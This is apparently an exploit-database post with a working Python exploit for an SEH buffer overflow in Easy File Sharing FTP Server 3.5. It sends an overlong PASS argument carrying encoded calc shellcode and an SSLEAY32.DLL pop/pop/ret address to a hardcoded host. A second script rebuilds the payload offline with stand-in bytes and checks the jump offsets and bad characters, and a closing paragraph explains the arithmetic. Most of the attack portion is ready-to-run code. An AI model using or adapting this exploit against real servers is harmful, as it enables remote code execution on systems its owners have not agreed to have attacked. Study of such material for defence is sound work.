
Easy File Sharing FTP Server 3.5 Buffer Overflow

Posted on 30 May 2014

```python
#!/usr/bin/env python
# Exploit Title: Easy File Sharing FTP Server 3.5 stack buffer overflow
# Date: 27 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vulnerability discovered by: h07
# CVE: CVE-2006-3952
# OSVDB: 27646
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.efssoft.com/ftpserver.htm
# Version: 3.5
# Tested on: Windows 8.1 Enterprise, English
#          : Windows 7 Enterprise SP1, English
#          : Windows XP SP3, English
#
# Description:
# A buffer overflow is triggered when a large password is sent to the
# server.
#
# h07 found this bug in 2006, targeting EFS FTP Server 2.0. The original
# exploits relied on OS DLLs to reference a pop/pop/retn address to leverage a
# SEH attack. This was a bit unreliable as different versions of Windows would
# have different addresses and the exploit would need to be modified with the
# correct pop/pop/retn address.
#
# Fast forward to 2014. EFS FTP Server is now at version 3.5 (2012) and
# includes new features, such as SSL support. Ironically, by adding SSL
# support, they've given us a reliable pop/pop/retn address in the included
# SSLEAY32.DLL! This exploit should work reliably with any Windows release.

import socket
import struct

# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
# (bytes literals so the same script runs under Python 2 and 3)
shellcode = (
    b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
    b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
    b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
    b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
    b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
    b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
    b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
    b"\x1c\x39\xbd"
)

payload = b"\x2c"
payload += b"A" * 2559
payload += b"\xeb\x19\x90\x90"                # nSEH: short jmp to nop sled + shellcode
payload += struct.pack("<I", 0x10017F21)      # SEH: pop/pop/ret, SSLEAY32.DLL
payload += b"\x90" * 30
payload += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.130", 21))
s.recv(1024)
s.send(b"USER anonymous\r\n")
s.recv(1024)
s.send(b"PASS " + payload + b"\r\n")
s.recv(1024)
s.close()
```
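The exploit's reliability rests on three things lining up in the PASS argument: the 4-byte nSEH slot at offset 2560 holding a short jump, the SEH handler slot right after it holding the SSLEAY32.DLL pop/pop/ret, and the jump landing inside the NOP sled rather than on the SEH record itself. The following Python 3 checker is an added example, not part of superkojiman's script: it rebuilds the same password layout offline, decodes the nSEH `jmp rel8`, computes where it lands, and scans for the two bad bytes (`\x00`, `\x20`) the shellcode was encoded to avoid. The offsets and the handler address are taken from the script above, and the 101-byte shellcode is replaced by a constructed run of `int3` of the same length so no real payload is needed to run it.

```python
import struct

# Layout values taken from the exploit above; they are assumptions of this
# added example, not something measured against the server here.
OFFSET_TO_NSEH = 1 + 2559       # b"\x2c" + b"A" * 2559 puts the next 4 bytes on nSEH
POP_POP_RET = 0x10017F21        # pop/pop/ret in SSLEAY32.DLL, as used by the exploit
NOP_SLED = 30
BAD_CHARS = b"\x00\x20"         # bytes msfencode was told to avoid

# Constructed stand-in for the 101-byte encoded calc shellcode: int3 breakpoints
# of the same length, so every offset matches the real script.
STANDIN_SHELLCODE = b"\xcc" * 101


def short_jmp(rel8):
    """Encode 'jmp rel8' (EB xx) padded with two NOPs to fill the 4-byte nSEH slot.

    rel8 is counted from the end of the 2-byte jmp, i.e. from nSEH + 2.
    """
    if not -128 <= rel8 <= 127:
        raise ValueError("jmp rel8 displacement out of range")
    return b"\xeb" + struct.pack("<b", rel8) + b"\x90\x90"


def build_payload(shellcode, rel8=0x19, handler=POP_POP_RET, sled=NOP_SLED):
    """Rebuild the password payload: filler, nSEH, SEH handler, NOP sled, shellcode."""
    return (b"\x2c"
            + b"A" * (OFFSET_TO_NSEH - 1)
            + short_jmp(rel8)                 # nSEH: jump forward over the SEH record
            + struct.pack("<I", handler)      # SEH handler: pop/pop/ret returns into nSEH
            + b"\x90" * sled
            + shellcode)


def seh_layout(payload, offset=OFFSET_TO_NSEH, sled=NOP_SLED):
    """Decode the SEH record inside a payload and compute where the nSEH jump lands."""
    nseh = payload[offset:offset + 4]
    if nseh[:1] != b"\xeb":
        raise ValueError("nSEH does not start with a short jmp")
    (rel8,) = struct.unpack("<b", nseh[1:2])
    (handler,) = struct.unpack("<I", payload[offset + 4:offset + 8])
    return {
        "handler": handler,
        "jmp_target": offset + 2 + rel8,      # rel8 is relative to the byte after the jmp
        "sled_start": offset + 8,             # first NOP after the 8-byte SEH record
        "sled_end": offset + 8 + sled,        # exclusive; the shellcode starts here
    }


def check_payload(payload, shellcode, handler=POP_POP_RET, bad_chars=BAD_CHARS):
    """Return a list of problems found; an empty list means the layout is consistent."""
    problems = []
    lay = seh_layout(payload)
    if lay["handler"] != handler:
        problems.append("SEH handler 0x%08x is not the expected pop/pop/ret" % lay["handler"])
    if not lay["sled_start"] <= lay["jmp_target"] < lay["sled_end"]:
        problems.append("nSEH jump lands at offset %d, outside the NOP sled"
                        % lay["jmp_target"])
    if payload[lay["sled_end"]:] != shellcode:
        problems.append("shellcode does not start where the NOP sled ends")
    found = [c for c in bad_chars if c in payload]
    if found:
        problems.append("bad chars present: " + ", ".join("0x%02x" % c for c in found))
    return problems


if __name__ == "__main__":
    good = build_payload(STANDIN_SHELLCODE)
    print("as shipped:", check_payload(good, STANDIN_SHELLCODE) or "layout OK",
          seh_layout(good))
    # Two mistakes the check catches: a jump too short to clear the SEH record,
    # and a handler address whose little-endian encoding contains 0x20.
    print("rel8 = 2:", check_payload(build_payload(STANDIN_SHELLCODE, rel8=2),
                                     STANDIN_SHELLCODE))
    print("handler 0x10017F20:", check_payload(
        build_payload(STANDIN_SHELLCODE, handler=0x10017F20),
        STANDIN_SHELLCODE, handler=0x10017F20))
```

With the script's own values the jump decodes to `EB 19`: 0x19 = 25 bytes past nSEH + 2, so execution resumes at offset 2587, inside the sled that runs from 2568 to 2597, and the shellcode follows at 2598. The handler encodes as `21 7F 01 10`, which is why 0x10017F21 is usable while a neighbouring address such as 0x10017F20 would smuggle a space (0x20) into the PASS argument.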
